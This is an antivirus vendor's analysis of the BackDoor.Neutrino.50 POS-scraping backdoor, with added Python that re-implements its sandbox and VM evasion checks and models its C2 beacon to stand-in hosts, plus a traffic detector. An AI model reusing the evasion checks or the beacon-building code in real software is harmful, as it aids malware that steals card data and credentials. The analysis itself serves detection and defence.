
BackDoor.Neutrino.50

Added to the Dr.Web virus database: 2015-05-02

Virus description added:

SHA1 (packed):   fcf7197bbae81292dc9e444dd9ee1fb6f510cd05
SHA1 (unpacked): a2b801df9bd8438adcf3c08d44bc42e34a83f7d8

A multicomponent backdoor that targets POS terminals (it scrapes payment card track data from process memory, see below) and can spread by exploiting the CVE-2012-0158 vulnerability.

Once launched, the backdoor checks its environment for debuggers, sandboxes and virtual machines as follows:

  1. Calls IsDebuggerPresent to check for an attached debugger
  2. Calls CheckRemoteDebuggerPresent to check for a debugger attached from another process
  3. Checks whether the user name contains any of the following strings:
    • MALTEST
    • TEQUILABOOMBOOM
    • SANDBOX
    • VIRUS
    • MALWARE
  4. Converts its own file name to lowercase and checks whether it contains any of the following strings:
    • SAMPLE
    • VIRUS
    • SANDBOX
  5. Checks whether kernel32.dll exports "wine_get_unix_file_name" (an indicator of running under Wine)
  6. Checks whether the registry key "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Tools" exists
  7. Compares the registry value "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\\Identifier" with "VMWARE", "VBOX", "QEMU"
  8. Compares the registry value "HKLM\\HARDWARE\\Description\\System\\SystemBiosVersion" with "VBOX", "QEMU", "BOCHS"
  9. Checks whether the registry key "HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions" exists
  10. Compares the registry value "HKLM\\HARDWARE\\Description\\System\\VideoBiosVersion" with "VIRTUALBOX"

If any of these checks succeeds, the Trojan displays the error message “An unknown error occurred. Error - (0x[random number])” and then BackDoor.Neutrino.50 deletes itself.
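The ten checks above, as an added evaluator that a sandbox operator can run to see which of them a given guest would trip. This is example code written for this page, not Dr.Web's or the malware's code. evaluate() reproduces the decision logic of the list above on values supplied to it; collect_windows() is an assumed way of reading the same signals on a live host (winreg for the registry keys, ctypes calls to IsDebuggerPresent, CheckRemoteDebuggerPresent and GetProcAddress for the debugger and Wine checks) and is only invoked when the script runs on Windows. The user names, file names and registry contents used when testing it are constructed.

```python
"""Which of BackDoor.Neutrino.50's anti-analysis checks would a given host trip?

Added example for this page, not Dr.Web's or the malware's code.  evaluate()
reproduces the decision logic of the ten checks listed above; collect_windows()
is an assumed way of reading the same values with winreg/ctypes and is only
called when the script runs on Windows.
"""
import os
import sys
from typing import Dict, List, Optional

USER_NAME_MARKERS = ("MALTEST", "TEQUILABOOMBOOM", "SANDBOX", "VIRUS", "MALWARE")
FILE_NAME_MARKERS = ("sample", "virus", "sandbox")

# (registry path, substrings compared against the value).  An empty tuple means
# the check is only "does this key exist".
REGISTRY_CHECKS = (
    (r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools", ()),
    (r"HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0"
     r"\Logical Unit Id 0\Identifier", ("VMWARE", "VBOX", "QEMU")),
    (r"HKLM\HARDWARE\Description\System\SystemBiosVersion", ("VBOX", "QEMU", "BOCHS")),
    (r"HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions", ()),
    (r"HKLM\HARDWARE\Description\System\VideoBiosVersion", ("VIRTUALBOX",)),
)


def evaluate(user_name: str, file_name: str, registry: Dict[str, Optional[str]],
             wine_export: bool, debugger_present: bool) -> List[str]:
    """Return the names of the checks that fire.  `registry` maps each path in
    REGISTRY_CHECKS to the value read (any string; "" for a bare key) or None
    when the key/value is absent."""
    hits: List[str] = []
    if debugger_present:            # IsDebuggerPresent / CheckRemoteDebuggerPresent
        hits.append("debugger")
    if any(m in user_name.upper() for m in USER_NAME_MARKERS):
        hits.append("user_name")
    if any(m in file_name.lower() for m in FILE_NAME_MARKERS):
        hits.append("file_name")
    if wine_export:                 # kernel32 exports wine_get_unix_file_name
        hits.append("wine")
    for path, markers in REGISTRY_CHECKS:
        value = registry.get(path)
        if value is None:
            continue
        if not markers or any(m in value.upper() for m in markers):
            hits.append(path)
    return hits


def collect_windows() -> Dict:
    """Read the same signals on a live Windows host (assumed API usage)."""
    import ctypes
    import getpass
    import winreg

    k32 = ctypes.windll.kernel32
    k32.GetCurrentProcess.restype = ctypes.c_void_p
    k32.GetModuleHandleW.restype = ctypes.c_void_p
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = (ctypes.c_void_p, ctypes.c_char_p)
    remote = ctypes.c_int(0)
    k32.CheckRemoteDebuggerPresent(k32.GetCurrentProcess(), ctypes.byref(remote))
    debugger = bool(k32.IsDebuggerPresent()) or bool(remote.value)
    wine = bool(k32.GetProcAddress(k32.GetModuleHandleW("kernel32.dll"),
                                   b"wine_get_unix_file_name"))
    registry: Dict[str, Optional[str]] = {}
    for path, markers in REGISTRY_CHECKS:
        subkey = path.split("\\", 1)[1]        # strip the "HKLM" prefix
        try:
            if markers:                         # last component is a value name
                key_path, value_name = subkey.rsplit("\\", 1)
                with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
                    data = winreg.QueryValueEx(key, value_name)[0]
                # REG_MULTI_SZ values (e.g. SystemBiosVersion) come back as a list
                registry[path] = " ".join(data) if isinstance(data, list) else str(data)
            else:
                with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey):
                    registry[path] = ""
        except OSError:
            registry[path] = None
    return {"user_name": getpass.getuser(), "file_name": os.path.basename(sys.argv[0]),
            "registry": registry, "wine_export": wine, "debugger_present": debugger}


if __name__ == "__main__" and sys.platform == "win32":
    print(evaluate(**collect_windows()) or "no check fires")
```

Run it inside the sandbox image as the analysis user, with the sample renamed the way the sandbox normally names submissions; every string it prints is a check the guest must hide (rename the user, strip the VBOX/VMWARE strings from the SCSI identifier and BIOS version values, remove the guest-additions keys) before the sample will stay resident instead of self-deleting.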

During installation, the Trojan creates the "%AppData%\\W2VTWFFiQQ" directory, copies itself there, and adds an entry under "Software\\Microsoft\\Windows\\CurrentVersion\\Run" for persistence. The hive (HKLM or HKCU) is chosen depending on whether the process has administrator privileges.

As the name of the Run value, the Trojan picks a file from the %windir% directory whose name matches one of the following masks:

install*.exe
setup*.exe
update*.exe
patch*.exe

If there is no matching file, the Trojan uses the "svchost.exe" name.

The copy is given the creation timestamp of "explorer.exe" and the "hidden" and "system" file attributes.

The Trojan then starts a separate thread that watches the autorun registry value; if the value is modified or deleted, the thread re-creates it.

Once running, the backdoor gathers information about the infected system: the machine GUID ("HKLM\\Software\\Microsoft\\Cryptography\\MachineGuid"), OS version, architecture, and the type and version of any installed anti-virus software.

The Trojan can also remove other malicious programs it finds on the system (the "botkiller" command below). It checks every executable file in %APPDATA%, %TEMP% and %ALLUSERSPROFILE% with the WinVerifyTrust function. If the signature check fails (the file is unsigned or its signature is invalid) and a running process belongs to that file, the backdoor removes its autorun entry from "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" (again in HKLM or HKCU depending on administrator privileges) and then deletes the file.

The backdoor counts the files removed this way and reports the number to the command and control server (the "quality" field of the beacon described below).

Besides operating on POS terminals, the Trojan steals data stored by the Microsoft Mail client and the saved FTP credentials of a number of well-known FTP clients:

filezilla.exe
ftprush.exe
winscp.exe
coreftp.exe
freeftp.exe
far.exe
ftpte.exe
smartftp.exe
flashfxp.exe
totalcmd.exe

Among running processes, the Trojan looks for the following browser processes:

firefox.exe
chrome.exe
iexplore.exe
opera.exe

In these browser processes it hooks the data-sending functions PR_Write, send, WSASend, HttpSendRequestW and InternetWriteFile. From the intercepted traffic it forwards to the command and control server the data of POST requests containing the substrings "ocsp" or "application/ocsp-request"; for Internet Explorer, the data of all POST requests is sent.

The "rate" value under the "HKCU\\Software\\N3NNetwork\\" key holds the interval between requests to the server, in minutes: the backdoor reads it and multiplies it by 60 seconds, capping the result at 1 hour.

Data is sent as the string "cmd=1&uid=%s&os=%s&av=%s&version=%s&quality=%i", where uid is the machine GUID of the infected computer, os describes the OS, av is the installed anti-virus, version is the backdoor's version, and quality is the number of malicious programs it detected and removed.

The list of command and control servers is hard-coded in the Trojan's body as a base64-encoded Unicode (wide) string; it may contain several server addresses separated by '*'. During initialisation the backdoor tries the servers in turn until one of them answers a PING request.

Server reply to a PING request can look as follows:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>
The requested URL /ionocube_/tasks.php was not found on this server.</BODY></HTML>
<!-- DEBUGcG9uZw==DEBUG -->

From the reply, the backdoor extracts the base64-encoded payload between the two "DEBUG" markers; in the reply above, "cG9uZw==" decodes to "pong".

The Trojan reads the current command and control server address from the registry, decodes it, and builds the following request (the string template as it appears in the binary):

"POST <!target> HTTP/1.0\r\n"
"Host: \r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"Cookie: authkeys=21232f297a57a5a743894a0e4a801fc3\r\n"
"Content-length: <!len>\r\n"
"\r\n"
"<!payload>\n"

where target and host are taken from the address of the server the data is sent to, len is the payload length, and payload is the base64-encoded data string. The authkeys cookie is constant (its value is the MD5 hash of the string "admin"), so it serves as a reliable network indicator for this backdoor.

Bank card data is sent in the following message:

d=1&type=%s&data=%s

where type is "Track1" or "Track2" and data is the track data scraped from process memory.
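The C2 exchange described above (server list decoding, PING reply parsing, the poll interval, the beacon template and its payload), as an added worked model that is not Dr.Web's or the malware's code. The PING reply is the one quoted on the page; the two C2 URLs, the machine GUID and the other beacon fields are constructed for the example. is_neutrino_beacon() and parse_beacon() are a simple detector and decoder for the request shape, the kind of thing you would run over captured proxy traffic; they key on the constant authkeys cookie (MD5 of "admin") and the fixed User-Agent.

```python
"""Model of the BackDoor.Neutrino.50 C2 exchange described above.

Added example for this page, not Dr.Web's or the malware's code.  The PING
reply is the one quoted on the page; the C2 URL list, the machine GUID and the
other beacon fields are constructed.
"""
import base64
import hashlib
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

PING_REPLY = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML>\n'
    "<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>\n"
    "The requested URL /ionocube_/tasks.php was not found on this server.</BODY></HTML>\n"
    "<!-- DEBUGcG9uZw==DEBUG -->\n"
)
# Constructed C2 list in the format the page describes: a wide (UTF-16LE)
# string, '*'-separated, base64-encoded.
C2_LIST_B64 = base64.b64encode(
    "http://c2-a.example/tasks.php*http://c2-b.example/tasks.php".encode("utf-16-le")
).decode()
AUTHKEYS = "21232f297a57a5a743894a0e4a801fc3"   # hard-coded cookie; MD5 of "admin"
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0"


def authkeys_is_md5_admin() -> bool:
    return hashlib.md5(b"admin").hexdigest() == AUTHKEYS


def decode_c2_list(blob_b64: str) -> List[str]:
    return base64.b64decode(blob_b64).decode("utf-16-le").split("*")


def extract_ping_payload(reply: str) -> Optional[bytes]:
    """The base64 payload sits between two literal DEBUG markers in the body."""
    m = re.search(r"DEBUG([A-Za-z0-9+/=]+?)DEBUG", reply)
    return base64.b64decode(m.group(1)) if m else None


def poll_interval_seconds(rate_value: int) -> int:
    """The 'rate' registry value is in minutes; the interval is capped at one hour."""
    return min(int(rate_value) * 60, 3600)


def beacon_payload(uid: str, os_name: str, av: str, version: str, quality: int) -> str:
    return f"cmd=1&uid={uid}&os={os_name}&av={av}&version={version}&quality={quality}"


def build_request(c2_url: str, payload: str) -> str:
    """Fill the request template from the page; the body is the base64 payload."""
    u = urlsplit(c2_url)
    body = base64.b64encode(payload.encode()).decode()
    return ("POST {} HTTP/1.0\r\n".format(u.path or "/")
            + "Host: {}\r\n".format(u.netloc)
            + "User-Agent: {}\r\n".format(USER_AGENT)
            + "Content-type: application/x-www-form-urlencoded\r\n"
            + "Cookie: authkeys={}\r\n".format(AUTHKEYS)
            + "Content-length: {}\r\n\r\n{}\n".format(len(body), body))


def _split(raw_request: str):
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def is_neutrino_beacon(raw_request: str) -> bool:
    """Detector: HTTP/1.0 POST with the fixed User-Agent and the constant cookie."""
    request_line, headers, _ = _split(raw_request)
    return (request_line.startswith("POST ") and request_line.endswith(" HTTP/1.0")
            and headers.get("user-agent") == USER_AGENT
            and "authkeys=" + AUTHKEYS in headers.get("cookie", ""))


def parse_beacon(raw_request: str) -> Dict[str, str]:
    """Decode the base64 body back into the cmd/uid/os/av/version/quality fields."""
    _, _, body = _split(raw_request)
    plain = base64.b64decode(body.strip()).decode()
    return {k: v[0] for k, v in parse_qs(plain).items()}


if __name__ == "__main__":
    servers = decode_c2_list(C2_LIST_B64)
    print("servers:", servers, "ping ->", extract_ping_payload(PING_REPLY))
    req = build_request(servers[0], beacon_payload("{GUID}", "Windows 7", "Dr.Web", "50", 2))
    print(req, is_neutrino_beacon(req), parse_beacon(req))
```

The 404 page is worth noting for detection: the server deliberately answers with what looks like a generic "Not Found" so that a casual look at proxy logs shows only failed requests, while the HTML comment carries the real reply. A detector that drops 404 responses before inspecting bodies will miss this channel entirely.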

The backdoor can execute the following commands:

Command     Action
botkiller   Remove other malicious programs
cmd         Forward the command to the command interpreter (cmd.exe)
dwflood     Flood a remote host with requests to download a file (the file is downloaded, deleted, and downloaded again)
findfile    Find the specified file and upload it to the remote server
http        Send a GET or a POST request
https       Launch an HTTPS flood attack
infect      Infect computers on the LAN and removable media
keylogger   Run the keylogger (logs clipboard contents and keystrokes, and takes a screenshot on each mouse click)
loader      Download a .dll file and run it with the regsvr32 tool
rate        Set the time interval between requests to the server
slow        Send a POST request carrying the "X-a: b\r\n" payload
tcp         Launch a TCP flood attack
udp         Launch a UDP flood attack
update      Update itself (the update is downloaded from the link given in the command)

The backdoor can be detected in the system as follows:

Mutex—"W2VTWFFiQQ"
Directory—"%AppData%\\W2VTWFFiQQ"
Presence of the "HKCU\\Software\\N3NNetwork\\" branch

Curing recommendations

  1. If the operating system can be booted (in normal mode or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of all removable media you use. Learn more about Dr.Web Security Space.
  2. If the operating system cannot be booted, change your computer's BIOS settings so that it boots from CD/DVD or from a USB drive. Download the Dr.Web® LiveDisk rescue disk image or the utility for writing Dr.Web® LiveDisk to a USB drive, and prepare the drive. Boot the computer from it, then run a full scan and cure the detected threats.

Run a full system scan with Dr.Web Antivirus for Mac OS.

Run a full scan of all disk partitions with Dr.Web Antivirus for Linux.

  1. If your mobile device is working normally, download and install Dr.Web for Android on it. Run a full scan and follow the recommendations for neutralising the detected threats.
  2. If the mobile device is locked by a Trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is shown on the device's screen), proceed as follows:
    • boot your smartphone or tablet in safe mode (if you do not know how, consult the device's documentation or contact the manufacturer);
    • then download and install Dr.Web for Android, run a full scan and follow the recommendations for neutralising the detected threats;
    • Unplug your device and plug it back in.

Learn more about Dr.Web for Android